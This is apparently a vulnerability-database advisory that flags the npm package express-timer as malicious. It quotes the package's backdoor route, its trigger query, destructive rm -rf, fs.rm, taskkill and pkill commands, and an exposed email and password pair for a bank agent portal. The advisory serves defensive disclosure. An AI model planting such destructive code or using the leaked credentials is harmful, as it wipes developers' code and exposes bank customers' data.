Logo
npm

express-timer @1.0.6

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5555

Ecosystem

npm

Summary

express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load: 1. Postinstall backdoor injection (scripts/inject.js): The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } }) . The injected _boom() recursively deletes the installer's ./src directory ( fs.rm(dir, { recursive: true, force: true }) ) and kills all node processes ( taskkill /IM node.exe /F on Windows, pkill -f "node.*<cwd>" on Unix). Any remote actor who hits GET /robots.txt?verify=destroy on the deployed server can wipe the installer's source and crash node processes. The injection persists in the installer's own source tree even after npm uninstall . 2. Auto-scheduled destruction on require (index.js): package.json sets main: index.js , and that file's top-level code calls scheduleDestructionAfter() with a 1-minute default timer. After 60 seconds, it executes rm -rf <cwd>/src (Unix execSync ) or the equivalent fs.rm on Windows, then kills node/PM2 processes. Simply importing the package destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard. 3. Bundled bank-fraud tooling (ibbl_statment.php): The tarball ships a PHP scraper hardcoded with credentials ( USER=mohiuddin767272@gmail.com , PASS=Sorifa@2020 ) for Islami Bank Bangladesh's customer agent portal at https://agent.islamibankbd.com , used to scrape arbitrary customer NIDs, account numbers, and transactions. Unrelated to the advertised purpose; redistributes access to a third-party banking system to anyone who installs the package. Supporting context: package.json author is the placeholder "Your Name" , the description ("Lightweight security helpers for Express") contradicts the actual behavior, and dependencies declares both a self-reference ( express-timer: ^1.0.0 ) and a revealing sibling express-self-destruct1 .

Source: amazon-inspector (5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.

SEE HACKTRON REVIEW → SCAN DEPENDENCIES